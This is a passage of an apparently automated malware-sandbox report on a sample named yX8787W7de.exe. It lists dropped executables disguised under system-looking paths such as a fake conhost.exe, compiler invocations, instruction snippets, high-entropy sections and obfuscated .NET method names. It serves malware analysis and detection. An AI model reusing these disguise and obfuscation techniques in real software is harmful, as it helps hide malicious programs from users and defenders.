Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline"	Jump to behavior

Source: C:\Users\user\Desktop\yX8787W7de.exe

File created: C:\fontrefcrt\__tmp_rar_sfx_access_check_4846859

Jump to behavior

Source: yX8787W7de.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0013F640 push ecx; ret	0_2_0013F653
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0013EB78 push eax; ret	0_2_0013EB96
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 5_2_00007FFD9BAA4B60 push esp; retf	5_2_00007FFD9BAA4B63
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 5_2_00007FFD9BAA3734 pushad ; iretd	5_2_00007FFD9BAA3735
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 5_2_00007FFD9BAA596C push es; retf	5_2_00007FFD9BAA5987
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 5_2_00007FFD9BE4BDF8 push esi; retf	5_2_00007FFD9BE4BE0C
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 5_2_00007FFD9BE45582 push ss; iretd	5_2_00007FFD9BE45617
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 5_2_00007FFD9BE4B577 push edi; iretd	5_2_00007FFD9BE4B578
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Code function: 31_2_00007FFD9BAD4B60 push esp; retf	31_2_00007FFD9BAD4B63
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Code function: 31_2_00007FFD9BAD3734 pushad ; iretd	31_2_00007FFD9BAD3735
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Code function: 31_2_00007FFD9BAD596C push es; retf	31_2_00007FFD9BAD5987
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Code function: 32_2_00007FFD9BAC4B60 push esp; retf	32_2_00007FFD9BAC4B63
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Code function: 32_2_00007FFD9BAC3734 pushad ; iretd	32_2_00007FFD9BAC3735
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Code function: 32_2_00007FFD9BAC596C push es; retf	32_2_00007FFD9BAC5987
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 33_2_00007FFD9BAB61E2 push cs; ret	33_2_00007FFD9BAB621F
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 33_2_00007FFD9BAA4B60 push esp; retf	33_2_00007FFD9BAA4B63
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 33_2_00007FFD9BAA3734 pushad ; iretd	33_2_00007FFD9BAA3735
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 33_2_00007FFD9BAA596C push es; retf	33_2_00007FFD9BAA5987
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 34_2_00007FFD9BAD61E2 push cs; ret	34_2_00007FFD9BAD621F
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 34_2_00007FFD9BAC4B60 push esp; retf	34_2_00007FFD9BAC4B63
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 34_2_00007FFD9BAC3734 pushad ; iretd	34_2_00007FFD9BAC3735
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 34_2_00007FFD9BAC596C push es; retf	34_2_00007FFD9BAC5987
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 35_2_00007FFD9BAB4B60 push esp; retf	35_2_00007FFD9BAB4B63
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 35_2_00007FFD9BAB3734 pushad ; iretd	35_2_00007FFD9BAB3735
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 35_2_00007FFD9BAB596C push es; retf	35_2_00007FFD9BAB5987
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 36_2_00007FFD9BAC61E2 push cs; ret	36_2_00007FFD9BAC621F
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 36_2_00007FFD9BAB4B60 push esp; retf	36_2_00007FFD9BAB4B63
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 36_2_00007FFD9BAB3734 pushad ; iretd	36_2_00007FFD9BAB3735
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 36_2_00007FFD9BAB596C push es; retf	36_2_00007FFD9BAB5987

Source: MsintoRefcommonsvc.exe.0.dr	Static PE information: section name: .text entropy: 7.446440922575369
Source: SwjJGfgwqbpLdPqvPFcqLsY.exe.5.dr	Static PE information: section name: .text entropy: 7.446440922575369

Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, i8MHTy5IUZXchyIkHoM.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'yPYFtYK47xE', 'mmCFW7bg6VW', 'oTfQ1eFcvAjPWeYZOkxv', 'LRHFkZFcQ5syrJf5qyo5', 'bPCwDBFcp1EP96pywLrn', 'rpB36oFc5bfDIsMruvNd', 'HFrGNOFci7wynK8etRNP'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, D9sVL9VYOoKcLa64l1l.cs	High entropy of concatenated method names: 'LICVUshTpO', 'fWIYjmFsJ31Gp4AJAbh6', 'N75ktXFsZLHC8y6BXL1b', 'anubxHFsMI8f0nUkvD06', 'E9ivY6Fswpft8Sva1kSR', 'zbIl0vFszJsonEJcNGKo', 'EfdXhGF8C7WseKf1eNR7'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, cLLiHJUx6fDetmWNaKE.cs	High entropy of concatenated method names: 'Dispose', 'DUIUYrl4aV', 'u2JU0QQcgH', 'Jb4UUc7w2k', 'q57YvPFLIWuoXeA3q49A', 'oSbjDfFL9yt28LAdiPqy', 'T5V7wvFL2V4XK609fVM4', 'a6qKXXFLZohdQg4rEdIW', 'e3C7bZFLMxtHfJA4fb1A', 'nIPVDBFLJ8yKXdsqYtUA'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, AuC9vOe6sFqHBNt43tA.cs	High entropy of concatenated method names: 'k68S0E0yEc', 'VBAYFBFPai9sCiPK3hLp', 'nKdSfXFPLVRIIuy6FOBF', 'Rju8COFPdCkYlWIV0J6Q', 'kt5', 'PJFeoIRfex', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, uwMIsmF0IVHZpv8PrHf.cs	High entropy of concatenated method names: 'BuwFhmipqy', 'E7LFv2h1aZ', 'RMJFQIktac', 'vgYpB4Fg0mPh6DRAOOrv', 'JKRlIdFg4PtVKEobhZ97', 'GjBbymFgY16KZQjv4WR2', 'Ahlm8XFgUoMLTYQvtyBp', 'GKFtNTFghoHxSeYLTJkc', 'm6OBx5Fgvv3hjG20nYpi'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, FkykDdtlt3RckAZ1xhG.cs	High entropy of concatenated method names: 'aZht4uG64F', 'c7GtYKXhl3', 'SXAt0t3dup', 'juiKdbFypLUdrHKD8l1y', 'B9xVJHFy5l5qx1J0D9Fs', 'G4iZGcFyvV3PxuaBctHC', 'FnEPZAFyQvLvTmRj55m6', 'RHZsKuFyixoP09fpp2df', 'jBNeAHFy6Ew3VIkEQ3Qc', 'kj6BRHFyXGLJFHkABd8f'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, Rp0ihpmPKMlOOyDDGim.cs	High entropy of concatenated method names: 'thtWmJj82g', 'tIEWWrqTqd', 'NJPWfkTFxw', 'OSg9qkFNRSA2LfM3Zfto', 'H0H5JQFNmengNBySGuXI', 'T1XgHBFNC7uym3S9iIeu', 'g4HolBFNF2ta5YYg17Kx', 'BRBWxV84ox', 'ifghdUFNfUJOMrXlb1qc', 'JqybQnFNqSp1NBFdFrah'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, aQGccvNwdjIgwoYMEiu.cs	High entropy of concatenated method names: 'a87bCruZsj', 'kVxbFDUd5M', 'Yd7', 'lvTbRZrpvk', 'EiSbmDNwnK', 'afqbWK1N8k', 'nwcbfUkajJ', 'MBlgCpFG7tP8qVJdLirA', 'dKBmZRFGHBk4pJPBdNAW', 'sqLrUIFGnksAT0VuvROx'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, oG2KJpqE5Ffil8OrnND.cs	High entropy of concatenated method names: 'XXwqbFc7NN', 'JfrxGKFeeIKmUlo4JxXe', 'k5p9LpFeNwtX2OwUS5vh', 'cRcOtdFebOsP7wG4VM7q', 'hADCU7FeShJ8aGfndggk', 'lOjl6rFeySMFb1gMntXG', 'E94', 'P9X', 'vmethod_0', 'CdRFWicXVaD'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, DO2t60RfR2XgTQMBRrC.cs	High entropy of concatenated method names: 'bwgRBgY9j4', 'O1pRtYsRJ9', 'Eu4R1lxYsy', 'exsRlnebMX', 'SJfax0FrlsIQoZPhVfS1', 'DSR00OFrtUMsDZBxhJUt', 'TJ7epXFr1A7ftCxWhnGY', 'bxPLdbFrxfyqgheoqtCT', 'BfRlkEFr4mRNxl9OwcVe', 'Tm61PBFrY5EpiYB70r92'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, nfG7DffHYnOReArO7DN.cs	High entropy of concatenated method names: 'wpOfGgnGSb', 'bvm0X1FeCCHveSvHDRC6', 'r3og7tFbwP8LGj8REaHv', 'SOmmArFbzUV43L6Nm3hM', 'hLfwhTFeF2JsGlHnqS4g', 'U1J', 'P9X', 'j2yFWhF0WtQ', 'NPPFWvLWdB0', 'DKMFtBS7a9n'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, iaYXFhjlgvTwxL6B5PV.cs	High entropy of concatenated method names: 'Xs6jbGlhAN', 'isOj4eDFOS', 'y8PjYmvYyT', 'MuHj0oDKGn', 'klsjUMhxSE', 'hDVjh7OLLt', 'n14jvrWJjR', 'LFOjQEiLb4', 'zqEjpYsyDD', 'EBuj5EpdSt'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, I5ND6dyPJv9U5fSS4bc.cs	High entropy of concatenated method names: 'eSy2uOFAZhNK6wTWIqy9', 'aMMKXHFAMd4ZlJCYn048', 'YLEAfeFAJcja92jhR2MQ', 'MaSyurq4os', 'Mh9', 'method_0', 'FWJyIogGIu', 'y6gy9MhSID', 'mDyy2JoKqt', 'hYFyZTIeNW'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, zdnBb2BbysFyXAB2SfU.cs	High entropy of concatenated method names: 't9yBSZoXU6', 'rSgByZCN0Z', 'Ux3IToFSHsWDGBFM93Ax', 'Bj9kLjFSneB532LNbdNq', 'tXcBUjFS79QSMCI8LV6Q', 'VehSEAFSsTmaqDUJm01b', 'yxymfkFS8xhgQsTixfoA', 'p6mSWqFSGEks0PiiWPdL', 'oNEdDrFSPHFdmbllHUp4'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, NoU9uRNnDjGBMU3eWRb.cs	High entropy of concatenated method names: 'YF3NsvHyuS', 'SDmN8fqQoB', 'rUYNGod4Bl', 'EXGNP4SmOw', 'V2eNAP7aeX', 'rnK8EmFGefapmwwIvhBI', 'ioCLcFFGSWuSGLL4AZH1', 'OanH2fFGyrdEDl8QH3gt', 'ixTF91FGN7QlC6DVQLMv', 'j0EwJIFGb0uthdtcKMy5'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, LlmiaaFw5vkf1uI2WFd.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'fTGFtF27Vrb', 'tppFWFnnMPA', 'xPLiZlFg2h1WkJ64Rej9', 'UfA99YFgZ5m0kLiQMjus', 'IPOb56FgMmYBoDeRgylZ', 'INX3SXFgJaH6ZMS6JlGE'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, vyXf3ut7A1eNiF2hDQR.cs	High entropy of concatenated method names: 'JSRt2c8HRV', 'hd6HgsF3UHfHcmbS0iW0', 'QFGrAoF3YAD9LG68O8pM', 'gjtglWF30TjSbWMIVJvV', 'JSJ8GTF3haachJ41OVOp', 'P9X', 'vmethod_0', 'bcrFWgyvftZ', 'imethod_0', 'Q2bIb4F31Vo5EOCL7cMq'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, l4YxQJSPv60jeyKi3Cc.cs	High entropy of concatenated method names: 'v8pSuXNb1c', 'k6r', 'ueK', 'QH3', 'wx5SI962ou', 'Flush', 'GvQS9tgHvE', 'sOoS2YP6U0', 'Write', 'XPmSZv0WDh'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, UM9xxuFIqa7FAijmiUO.cs	High entropy of concatenated method names: 'P9X', 'TP4F2kvWwA', 'coQFtCPDvSZ', 'imethod_0', 'd81FZOYtGo', 'i3u7G9FgGTWXLX0QpIaA', 'CLNZrbFgsoPRUNvaMpU0', 'zHiNpoFg8TvBKSYo4TXx', 'ux5vOaFgP67oiqr3ffRt', 'pDVnHHFgAo78DPdlHcgp'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, XliTLta3PNtHkmSBql7.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'L3oPugFuEJNcV1qf4wRp', 'SZD0AQFuoSgkennX53R7', 'uKuy5XFujPS0pSUY8wiU'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, leZj9MIbd0D3vevLXls.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'DIGISlr55r', 'CDlZM5F2elHaHK53jcwE', 'oQVkxwF2SnOvVO3Blhq8', 'gE7EfJF2y7FIj8Neovca', 'RbFaP4F23HPJTBoVDQB8', 'cq1qbxF2aoIEoI6EMHSb', 'vGkRiBF2LbAyAOc4JrKq'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, YST0BhBFTfLMUgDUTPd.cs	High entropy of concatenated method names: 'UtxBm6kV9y', 'NqjBWitJFw', 'LHYBfGUvbW', 'ccZNE8FSmvuurd1pj3va', 'bMA8fXFSFtDM8BrJOygt', 'bx4cNrFSRqgYBSBD8WUR', 'gPxpIeFSWEFWvvMnWTQx', 'ge8b9qFSfwskWj51KGSY', 'oh9WQ0FSqLTnkGD4hHqt', 'jBBchvFSBdfIN5RXubEC'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, HhrWNMWK2fpm2NgJOhX.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'Uy8FtmelKSI', 'tppFWFnnMPA', 'Uq5WwIFNouY9iZFeoxsd', 'Lo5kpFFNj5qHmoPJ2f6y', 'rEURTiFNEIbEmD8LIN3x'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, TZsLZfd16BC61SSk9gw.cs	High entropy of concatenated method names: 'k9rdE60HPB', 's8AH9dFIBTnppD45mWM3', 'Df6LvoFIt8h774RMDWEw', 'xNJ4M3FI1LlHIgNU1PKi', 'kQiOC4FIlSCuXAcPyBa0', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, U8hbBi10Ip00baZdKYF.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'AFbZm2F3cGT2XFhv7nVd', 'wr4NwAF3Dd3rc21a4s00', 'OlEog5F3OVp03Pg277Fq', 'fSJ1hZQaMs'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, dFEVcOTb1D5Ls50Kop2.cs	High entropy of concatenated method names: 'LvTTSTlicZ', 'EUmTy4cWOt', 'uEeT3kJrQX', 'yrBTahkHwx', 'vymTLNYsKD', 'FO1TdmERPe', 'KV1TTtN221', 'zBrTcaat2x', 'WtSTDNsfY1', 'mMUTOB3oCf'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, y0ZRH8S3hG81V9sFWdq.cs	High entropy of concatenated method names: 'Close', 'qL6', 'EhXSLahHXR', 'fbWSdU3Iap', 'W9oSTrG4gK', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, ogCmltc3yXmTbx1gfX7.cs	High entropy of concatenated method names: 'sX1chiF9DDZV0UM7Q0Il', 'U6roc0F9Om2bjJtwlwe4', 'KDB4WuF9TI8aoxFNcGhV', 'GbarTwF9cZwDDORg2Yp9', 'U987fsF9L65XRDcIPwZT', 'abdZMDF93S3OkSHf9cjt', 'm9BgYSF9ak0So3vqCa4d'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, vhW8De5ri7L0uBXZgxu.cs	High entropy of concatenated method names: 'bOV5acULf9', 'JgPMl8FTz2NLlw5Fl7pO', 'dcmY7SFTJoOk4ZxRrUAs', 'qmUQtDFTwgkUx08sNswv', 'OmHPaNFcCNQnN7mhJGGP', 'g255NeEk1T', 'l7X5bN2ald', 'oNr5eOJbnf', 'SXH7jAFT2XXsxgYA4uBh', 'mHwQaEFTZDqu3xKQYust'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, ipZ7PHdnIe369T70yff.cs	High entropy of concatenated method names: 'sJAFtEfXRv9', 'wp1ds9Vwwd', 'dtOd8XiUKI', 'mD1dGwuuta', 'ucBfvVFIiShj5CuKuBJy', 'wx8S4fFI6FIsYXYHjfaq', 'gQfm4UFIXhyjtulD3xbE', 'UX5qb6FIo3otMYqSIW4N', 'W2KEiHFIj3rgCmO27uK8', 'qZGhrCFIEiVakCBPaRjX'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, o7QBsXRbkvfTHVqk6bs.cs	High entropy of concatenated method names: 'P3kRDVx9Ms', 'F8jROQrAH0', 'kqxETYFrybJKQuNqnaWv', 'SjU5qWFreceoW9UVyvQi', 'pIyRgcFrSLQxDf6DTAuU', 'ntmhkhFr3ZWQ1mcQUTq2', 'l8yRscNqUX', 'JENSoxFrTJ3UIw8u8TFn', 'KXuITMFrcKVFq1qWrObj', 'cG7iTCFrLiEikDDCxNsT'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, T5JQRuWTsFGF6mVo462.cs	High entropy of concatenated method names: 'lQiWJCClZl', 'M39KGmFbmd3V9JedngKM', 'RiK948FbFqSbpDkEGwXH', 'uM1rrSFbRJK3xSRgxbD4', 'Am2USnFbWcvmaGo10Lm6', 'iDq8UNFbtSsA5HxRNUI4', 'oHa1ScFbqm4iY8gI4FiQ', 'PbAxd5FbBslQQuZ5B65X', 'mFuADAFb17brMW9GxmLm', 'B8Gfq3KVel'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, hUeysmJTMMCuD9vbtDG.cs	High entropy of concatenated method names: 'c4KFqe1xuwq', 'ng5FqSPwknt', 'yW4FqyKI01L', 'Ce1Fq3kZUlS', 'h3dFqaqYLOY', 'uB8FqLgeGw7', 'nlVFqddaGBK', 'zsywfKVUri', 'sDRFqTJ7bR0', 'modFqcEP3UX'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, aYryTSUoVJqCteKVAgg.cs	High entropy of concatenated method names: 'Dxh5YhWTlQ', 'oDf50iMM52', 'LAA7vsFTcWkeTegZ3jO0', 'CVZv2xFTdAPuj9rL5LGU', 'YbYhwGFTTtphh3G4K7wc', 'PuO5yVFTDwZDhhuyPXUh', 'ILKPSCFTOA9DiNjljsdU', 'aiB556ecDt', 'NKqnU3FTnHWZDoCv8Al6', 'qWyk0LFT70w08y85cEsJ'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, h2qYPjB5wpqUvZLVs9w.cs	High entropy of concatenated method names: 'm5aBrWXGbv', 'tsOHAoFSdGyGUrbufcZ9', 'EyLK1HFSTDgDy9qt1Ufs', 'VjPFeEFSavnDCBjP2viK', 'XTJBdwFSLRoKuWJqmHFO', 'd5oHXKFScYByyrNpnEf5', 'l5aTrWFSDHxfeqfvQQd6', 'EC7B6SHRNb', 'u8nBXpI018', 'IQpBo7hihD'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, Glrptntv08UUWSF53LF.cs	High entropy of concatenated method names: 'k7ati9w0vV', 'c8H2ATFyytbfHRgMHK1j', 'GKHKorFyetAy6eftd3Ti', 'TNSY4GFySyAmYMQo7GCn', 'HBJyJ3Fy3NPLAUap81iQ', 'LU1tpbkXhC', 'WZuUjkFygRskAQ2ERH6E', 'Rkvd3DFyrBODuWpWOJ9y', 'OrRnLDFyV2obSrk2dQID', 'dl58pFFyKuhYlXSEtpZU'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, o1oYKWid2KpX1FvrONH.cs	High entropy of concatenated method names: 'N2N', 'HZZFtUnfp3N', 'mTIicQJpJt', 'ThEFthyai0i', 'J6R3SbFDfAtT83eJRN6i', 'vj8fQ2FDqb4fje6Exa72', 'N8CVIjFDmtD0A7xdnccG', 'XvoFYUFDWQBPQxUywDvx', 'L83q5ZFDBQgoPER7gAHi', 'XCjJTfFDt9vwPA2cO0s1'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, TRm9WYILYoLflnXClmm.cs	High entropy of concatenated method names: 'LsNFtkPbFsZ', 'Nk8FqKRgeP3', 'ytoTnqFZBF59dEh8pKoW', 'F4cSclFZfTjBBRSyhPcW', 'VYwY8AFZqbZbHd0Sl7wk', 'wG04XIFZxGFOEpojA68C', 'hKthmoFZ1MPxrL1xNMes', 'tEk6HvFZldlBN2xpgtjj', 'qtjgUOFZ4iu6Bb9TrGRU', 'imethod_0'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, UcGflgBDT3lsQIJRV0o.cs	High entropy of concatenated method names: 'nsHB2JaU3D', 'B97BZSsdd1', 'LnkGGPFyWajv91KqHjhW', 'GRvdjrFyRBX9oiVYtcub', 'db71vvFyme8GQQbJBXhT', 'jsskJAFyfrpXQf1wjpGO', 'weKBH1LHME', 'lGVBn9aKfs', 'oOHB7HEkJe', 'k9JBsUyOpd'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, RKIDm31jt3nbX5Wu9NT.cs	High entropy of concatenated method names: 'sQ5U52FLbp01haYDFrcS', 'IAI25PFLVpj1KOrqdgka', 'CJr0vRFLN2hSPQDRTiqa', 'o5L0wyVt0e', 'tAJ0GeFLSysc3DB2JQWv', 'I7ZWbRFLyGE0a0PjEqLm', 'QQvxviFL34fVmHbnBn9Z', 'MDXvb6FLaPwKnkuONyaw', 'QihUFE6Niw', 'JCojaRFLc8LyKwgq4pM4'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, fX8eQwiGCO6SdHJqcBH.cs	High entropy of concatenated method names: 'OKMFtvnjs5T', 'LZGiAI7IKZ', 'QmUFtQ3vdQ5', 'T7UaVPFDvMHhOrIgdJEU', 'tTsyYvFDQYnhZFlVCdKH', 'NFi66WFDUQDlAwCy8biO', 'DJQqVdFDhDBHjPfZp21a', 'byGUyIFDpCIpJmIwhYVO', 'xQXyU8FD5I1CqRlQYLAU', 'erqZaWFDiLnTbgvuxxVr'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, FrEqMemkBngvOql2XZc.cs	High entropy of concatenated method names: 'fiTmOoDbMD', 'je2mHdF193', 'q5tmnJwMkt', 'rSAP8nFVT3FbMIUqJme0', 'mdxZOtFVcNV4q4MKGvjY', 'S73i1gFVLuUs2cCAEtdj', 'aZgpRHFVdRZG2nwPRj1N', 'BhRmrJZfSK', 'yZKmVusUgO', 'zTSmNYhlnd'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, n51JElzTmUmkggO9LA.cs	High entropy of concatenated method names: 'tw0FFXXuJ2', 'bnsFmS0TNr', 'ahSFWWZ3xM', 'GENFfDLhAx', 'PMOFqgE6Jp', 'k27FBigkJa', 'tyPF1TwqKq', 'CuduQmFgmokVcBJrYxDX', 'woYjhYFgWlA7B0cXF4C9', 'VMdfjQFgfsvRHFMcNrZo'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, YXAOeSKjqyIxbBq3IcE.cs	High entropy of concatenated method names: 'eHtKK5JaCB', 'DupKkx2FOb', 'IfLKgQCaSn', 'JhCKr724v0', 'e1EKVwflY7', 'ti4aQCFnLKMmK2KSh2vi', 'WPVnVwFn3jLZaMCnHwgB', 'XbfRMnFnaONBXIV4AFXS', 'nRqJp6FndSunhXyQ5uQr', 'qHs4xYFnTML2uAPOWFWM'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, D2p9XAqyRSObWLQZe0B.cs	High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'gknFtlu7GB3', 'tppFWFnnMPA', 'dMvdhJFeaYvZ7YHeTOqi', 'OgP91TFeLF5NL3vJI3XA', 'U9rUxtFedqpxvf0m2k4X'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, no4PKlrwIkMZVpKKVjy.cs	High entropy of concatenated method names: 'qYAVCCEO2n', 'i3gVFHY6HS', 'etKVRPliSX', 'je4VmwOOs6', 'KDiVWxudIt', 'Y7SVffXN7F', 'Si1cHVFscn1c3i9ahUMr', 'c80cFuFsd1gAMkZa4w06', 'pQ5AoJFsTFZTfJ1cvDyJ', 'O1NgL8FsDOpUsrboaaDc'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, EBqZ44fAx1Cx4xcMqDt.cs	High entropy of concatenated method names: 'u2pfMMSIHr', 'qHXfJD5Z3P', 'SZLfwMrUtT', 'H9afzXTWPa', 'NIVqCwbAMq', 'MRrqF3H6fe', 'tToqRJO17P', 'WhifryFelTlyi5apqveC', 'qLqZqBFet6ABNSh4jjJj', 'ALOMoZFe1FqCy4pgaETt'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, LqXXCXbtkhyL3k8Wu7s.cs	High entropy of concatenated method names: 'ASPblfPqml', 'olTbxDT1dY', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'Ud8b4kjWvU', 'method_2', 'uc7'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, ELfSQutga90qN9hiPTZ.cs	High entropy of concatenated method names: 'MMrtVmh4qw', 'IGBtNc3J07', 'bSmtbygvhw', 'dvJteQSfCV', 'Uf0tSfst4p', 'asvtyyOQqp', 'CbBxZZFyuyP8g6U1ohAR', 'pVUPeqFyIkJLfpFokAHD', 'j3yC97Fy9GwJIhsFYTS6', 'eYclNeFy2eJYfGo4oetw'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, d276UegDlySAk6ipgAK.cs	High entropy of concatenated method names: 'VqfgJ2gI0K', 'MmrgzgvRnx', 'Jo8gHAVTpC', 'NX5gnRFHWr', 'IGeg73xr61', 'GmkgsOXh2d', 'wtwg8Akgok', 'akBgGlq7W3', 'g3kgPkmNYA', 'yAigA01y1G'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, HFpfHkVcEPMgdY0KgJk.cs	High entropy of concatenated method names: 'CfFVORQb2C', 'moUVHEcPSj', 'MYlVn1jSNW', 'YpDV77QJnq', 'D4SVsZUSkf', 'q7oV8ZIrBJ', 'E2JVGDsinG', 'J9OVPWSUTC', 'xFdVAFarsR', 'zeZVux7Jt0'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, eCc9safhO5jkv3cSGMm.cs	High entropy of concatenated method names: 'OgbfgafHZu', 'KhOfrCiC3J', 'nWwfVWcGtU', 'RdSpBZFb300tAWl6VVBM', 'xhO1HCFbaD5hxaVF70Dl', 'd8PbogFbS06F4wQbVjNb', 'A6wMkEFbyLq9AKrWLlql', 'M1nfjGHuvC', 'aiWfEoIjpg', 'EisVanFbblWFXBgWaVti'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, SFJ0Yp6hbywbZLCPU1g.cs	High entropy of concatenated method names: 'WlMpu4FOlkEAIsLIDHeU', 'g6b8cTFOxtWYDTQ0hxAh', 'feacnaFOtfk25udhUHiA', 'DY6WLFFO102y2JvVAs0B', 'method_0', 'method_1', 'q3s6QvcnKO', 'Cu56pf1sIr', 'jqY65tZ0bf', 'TxL6igftkC'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, sOQSJw1RbCONc9XBNnw.cs	High entropy of concatenated method names: 'Hn81WYab80', 'vZm1ftL3g7', 'w9T1qlbGRB', 'MRi1BH926E', 'qo41tUXMLC', 'NLE113e0sK', 'ekV1lM2Ck2', 'WY41xnMJN7', 'Owe14Dicsc', 'FN71Y85aWk'
